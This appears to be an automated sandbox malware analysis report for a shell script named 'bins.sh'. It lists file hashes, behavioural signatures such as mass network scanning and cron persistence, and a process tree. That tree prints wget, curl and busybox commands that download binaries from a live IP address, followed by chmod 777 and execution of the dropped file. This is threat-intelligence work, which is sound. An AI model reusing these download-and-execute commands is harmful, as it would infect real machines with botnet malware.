Analysis
- max time kernel: 149s
- max time network: 151s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240508-en
- resource tags: arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
- submitted: 09-11-2024 17:37
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
- Target: bins.sh
- Size: 10KB
- MD5: 9bba4ee40fc1f939fff061054cf330df
- SHA1: f27d57c589ca7606dde15a500b6289240182abd1
- SHA256: 8aeecbca04728d12f9a2c6fc99c020f6a2a452d8818725dbcada6bc8610c85dd
- SHA512: a58ef1fcfd72e938d3137363918dde300be1813e9ef4e9856f3bf7fb9f92590081a19bf35cd0e40952db1f607e63da93f211da11d533af8d05274007f423dee3
- SSDEEP: 192:ogNwwwYwWw1wBwRVwpAiwwwYwWw1wBwIp:ogNwwwYwWw1wBwRVwaiwwwYwWw1wBww
Malware Config
Signatures
- Contacts a large (2202) number of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Creates a large number of network flows (1 TTP)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTP, 1 IoC)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes: chmod (PID 1513)
- Executes dropped EXE (1 IoC)
  Processes: /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (PID 1514)
- Renames itself (1 IoC)
  Processes: OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (PID 1515)
- Creates/modifies Cron job (1 TTP, 1 IoC)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  IoC: file opened for modification /var/spool/cron/crontabs/tmp.MeOfSA (process: crontab)
- Enumerates running processes
  Discovers information about currently running processes on the system.
  Processes: OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw
- Writes file to tmp directory (4 IoCs)
  Malware often drops required files in the /tmp directory.
  IoCs:
  - File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (process: wget)
  - File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (process: curl)
  - File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (process: busybox)
  - File opened for modification /tmp/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 (process: wget)
Processes
- /tmp/bins.sh: /tmp/bins.sh (PID:1505)
  - /bin/rm: /bin/rm bins.sh (PID:1506)
  - /usr/bin/wget: wget http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (PID:1507)
    Signatures: Writes file to tmp directory
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (PID:1511)
    Signatures: Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (PID:1512)
    Signatures: Writes file to tmp directory
  - /bin/chmod: chmod 777 OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (PID:1513)
    Signatures: File and Directory Permissions Modification
  - /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw: ./OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (PID:1514)
    Signatures: Executes dropped EXE; Renames itself; Reads runtime system information
    - /bin/sh: sh -c "crontab -l" (PID:1516)
      - /usr/bin/crontab: crontab -l (PID:1517)
    - /bin/sh: sh -c "crontab -" (PID:1518)
      - /usr/bin/crontab: crontab - (PID:1519)
        Signatures: Creates/modifies Cron job
  - /bin/rm: rm OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw (PID:1521)
  - /usr/bin/wget: wget http://216.126.231.240/bins/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 (PID:1524)
    Signatures: Writes file to tmp directory
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 112KB
  MD5: 05d7857dcead18bbd86d2935f591873c
  SHA1: 34d18f41ef35f93d5364ce3e24d74730a4e91985
  SHA256: 2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
  SHA512: d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
- Filesize: 12KB
  MD5: 6cae463fe7614c039bf68a1e612c159b
  SHA1: 4af7634363bcc026529fa68c8bebb399b268ba0d
  SHA256: 8b385d231f7a59f73af89fc544af19c802e2e932cdc4c8eca473ea313c765b00
  SHA512: a7cc4c48aae0f9cb0d52f179d9638b440d68975d6758ddfc90bdfa04d58218110eb63cda835170cf3a9b0d36e0c8209da7ece6528ae15529288b155622109be1
- Filesize: 210B
  MD5: d64dad17ec25f656980958e750ef4f6b
  SHA1: c15dd758761f96a75dc39f2da2c84e225cf00273
  SHA256: 540358ffe1a0161e8742ce4795b602c807de66501382dc9569874e34984443cd
  SHA512: 871ea19052ee74a4de0a656f68ea9f55af88f82f1d2bf104d5a8b4d05ff18c97adc26056e9c3d6525187ad8e83f79198d41d263d41aa96df831fd08d7e2d4bc5